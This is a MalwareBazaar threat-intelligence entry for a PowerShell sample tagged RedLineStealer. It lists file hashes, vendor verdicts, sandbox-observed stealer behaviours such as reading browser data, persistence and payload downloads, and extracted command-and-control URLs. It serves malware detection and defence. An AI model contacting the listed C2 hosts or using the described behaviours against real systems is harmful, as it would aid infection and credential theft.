MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RedLineStealer

Vendor detections: 8

Intelligence 8 IOCs YARA 1 File information Comments

SHA256 hash:	8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9
SHA3-384 hash:	944e4acf56444593df243eabe941be4472e41773935bd1b6a64cbaa0635f7ad8c114a63ff5bc821962554ceb631f5731
SHA1 hash:	14fa1399d6031b1f9c4df109e4e4b2e572d5706a
MD5 hash:	20581279d66ec4840c8ec63d11064493
humanhash:	early-quiet-network-hamper
File name:	mx1.ps1
Download:	download sample
Signature	RedLineStealer Create hunting rule
File size:	852 bytes
First seen:	2022-01-18 12:11:59 UTC
Last seen:	Never
File type:	ps1
MIME type:	text/plain
ssdeep	24:iR1tJOxwIAEVWdTagQxhxUOj6AIyChZOY:K7sWIAEVCTb6xUPAIyCuY
TLSH	T1F101CCB9CF61FDE1031F758054143E2B20EDC727AB391E28E5A019B3A838352EF23188
Reporter	Anonymous
Tags:	ps1 RedLineStealer

Intelligence

File Origin

# of uploads :

# of downloads :

239

Origin country :

n/a

Vendor Threat Intelligence

Detection(s):

SecuriteInfo.com.PowerShell_Case_Anomaly.31443.18791.UNOFFICIAL

Verdict:

Suspicious

Threat level:

5/10

Confidence:

100%

Link:

https://www.filescan.io/uploads/61e6ae9bd32385db63018eaf/reports/62c13e28-09f1-4b38-a520-ccf9d606fabf/overview

Result

Verdict:

MALICIOUS

Details

Base64 Encoded URL

Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.

Empire PowerShell Request

Detected a base64 encoded Powershell HTTP request that is likely sourced from Empire.

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9/

Threat name:

Script-PowerShell.Trojan.Heuristic

Status:

Malicious

First seen:

2022-01-18 10:08:05 UTC

File Type:

Text (Batch)

AV detection:

7 of 27 (25.93%)

Threat level:

2/5

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=q6chkiigenlrhnwkaym4qac5iht4pgssznjmwi7jzzqqe2bxvluq._file

Result

Malware family:

redline

Score:

10/10

Tags:

family:guloader family:lokibot family:redline downloader guloader infostealer persistence spyware stealer suricata trojan

Link:

https://tria.ge/reports/220118-pc8m7abbgl/

Behaviour

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates physical storage devices

Suspicious use of SetThreadContext

Adds Run key to start application

Checks computer location settings

Reads user/profile data of web browsers

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Guloader Payload

Guloader,Cloudeye

Lokibot

RedLine

RedLine Payload

suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

Malware Config

C2 Extraction:

http://2.56.56.96/dx/gas/pin.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php

Malware family:

Lokibot

Verdict:

Malicious

Link:

https://www.vmray.com/analyses/878475210623/report/overview.html

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

Malicious File

Score:

1.00

Link:

https://yomi.yoroi.company/submissions/8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:	PowerShell_Case_Anomaly Create hunting rule
Author:	Florian Roth
Description:	Detects obfuscated PowerShell hacktools
Reference:	https://twitter.com/danielhbohannon/status/905096106924761088

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RedLineStealer

ps1 8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9

(this sample)

Delivery method

Distributed via web download

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample